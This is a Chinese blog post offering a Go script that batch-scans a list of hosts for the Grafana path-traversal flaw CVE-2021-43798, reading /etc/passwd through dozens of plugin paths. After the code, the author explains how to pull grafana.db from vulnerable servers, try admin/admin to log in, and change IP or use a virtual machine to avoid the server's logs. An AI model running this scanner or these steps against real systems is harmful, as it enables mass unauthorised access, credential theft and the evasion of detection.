【原创】CVE-2021-43798 grafana批量验证脚本

项目地址:https://github.com/light-Life/CVE-2021-43798

用golang简单写的脚本

package main

import (
	"bufio"
	"fmt"
	"io"
	"io/ioutil"
	"net/http"
	url2 "net/url"
	"os"
	"strings"
)

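// main reads base URLs from url.txt (one per line), requests every plugin
// path in the list below with an encoded traversal suffix appended, and writes
// each URL whose response body contains "root:" to test.txt.
//
// Changes from the original listing: a missing url.txt or an unwritable
// test.txt now stops the run instead of continuing with a nil file, read
// errors other than EOF no longer spin forever, blank lines are skipped, the
// plugin loop follows the slice length instead of a hard-coded 48, response
// bodies are closed, and the amount read from each response is bounded.
func main() {
	fileOpen, err := os.Open("url.txt")
	if err != nil {
		// The original wrapped the nil *os.File in a reader and then looped
		// forever, because only io.EOF ended the read loop.
		fmt.Println(err)
		return
	}
	defer fileOpen.Close()

	test := []string{
		"/public/plugins/alertGroups/",
		"/public/plugins/alertlist/",
		"/public/plugins/alertmanager/",
		"/public/plugins/annolist/",
		"/public/plugins/barchart/",
		"/public/plugins/bargauge/",
		"/public/plugins/canvas/",
		"/public/plugins/cloudwatch/",
		"/public/plugins/dashboard/",
		"/public/plugins/dashlist/",
		"/public/plugins/debug/",
		"/public/plugins/elasticsearch/",
		"/public/plugins/gauge/",
		"/public/plugins/geomap/",
		"/public/plugins/gettingstarted/",
		"/public/plugins/grafana-azure-monitor-datasource/",
		"/public/plugins/grafana/",
		"/public/plugins/graph/",
		"/public/plugins/graphite/",
		"/public/plugins/heatmap/",
		"/public/plugins/histogram/",
		"/public/plugins/influxdb/",
		"/public/plugins/jaeger/",
		"/public/plugins/live/",
		"/public/plugins/logs/",
		"/public/plugins/loki/",
		"/public/plugins/mixed/",
		"/public/plugins/mssql/",
		"/public/plugins/mysql/",
		"/public/plugins/news/",
		"/public/plugins/nodeGraph/",
		"/public/plugins/opentsdb/",
		"/public/plugins/piechart/",
		"/public/plugins/pluginlist/",
		"/public/plugins/postgres/",
		"/public/plugins/prometheus/",
		"/public/plugins/stat/",
		"/public/plugins/state-timeline/",
		"/public/plugins/status-history/",
		"/public/plugins/table-old/",
		"/public/plugins/table/",
		"/public/plugins/tempo/",
		"/public/plugins/testdata/",
		"/public/plugins/text/",
		"/public/plugins/timeseries/",
		"/public/plugins/welcome/",
		"/public/plugins/xychart/",
		"/public/plugins/zipkin",
	}

	file, err := os.Create("test.txt") // create the results file
	if err != nil {
		// Writing results to a nil file would fail on every hit, so stop here.
		fmt.Println(err)
		return
	}
	defer file.Close()

	// Upper bound on bytes read per response, so an oversized or endless body
	// cannot exhaust memory.
	const maxBody = 1 << 20

	// The suffix is the same for every request; encode it once.
	suffix := url2.QueryEscape("../../../../../../../../../../../../../../../../../etc/passwd")

	scanner := bufio.NewScanner(fileOpen)
	for scanner.Scan() {
		base := strings.TrimSpace(scanner.Text())
		if base == "" {
			continue // blank line in url.txt
		}
		fmt.Println(base)

		for _, plugin := range test {
			url := base + plugin + suffix
			resp, err := http.Get(url)
			if err != nil {
				// resp is nil on error, so skip to the next path rather than
				// dereference it below.
				fmt.Println(err)
				continue
			}
			fmt.Println(resp, url)

			body, err := ioutil.ReadAll(io.LimitReader(resp.Body, maxBody))
			// Close explicitly: a defer inside the loop would hold every
			// connection open until main returns.
			resp.Body.Close()
			if err != nil {
				fmt.Println(body, err)
			}

			// Heuristic only: any body containing "root:" counts as a hit, so
			// results should be confirmed by hand. A confirmed hit means the
			// server returned a file from outside the plugin directory; the
			// remedy is upgrading Grafana to a release that fixes
			// CVE-2021-43798.
			if strings.Contains(string(body), "root:") {
				fmt.Println("\n\u001B[1;32m[+] 存在漏洞\u001B[0m", url)
				data, err := io.WriteString(file, url+"\n")
				fmt.Println("\n\u001B[1;33m[+] 正在写入\u001B[0m")
				if err != nil {
					fmt.Println(data, err)
				}
				break // one hit per host is enough
			}
			fmt.Println("\n\u001B[1;31m[-] 无法识别\u001B[0m", url)
		}
	}
	if err := scanner.Err(); err != nil {
		fmt.Println(err)
	}
}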

直接go run hello.go运行即可

验证存在后访问var/lib/grafana/grafana.db

即可下载这个数据库文件打开user的表

密码是加了盐的,一般无法破解。(加盐是为了应对短密码被彩虹表爆出来,也就是碰撞。盐(salt)是个随机值,加密大概公式为 md5(md5(passwd)+salt),每多一位破解难度成指数上升。)

发现这login为admin的一般密码也为admin

登录进去即可,记得改ip或在虚拟机登录,后台会有详细记录的

==>转载请注明来源哦<==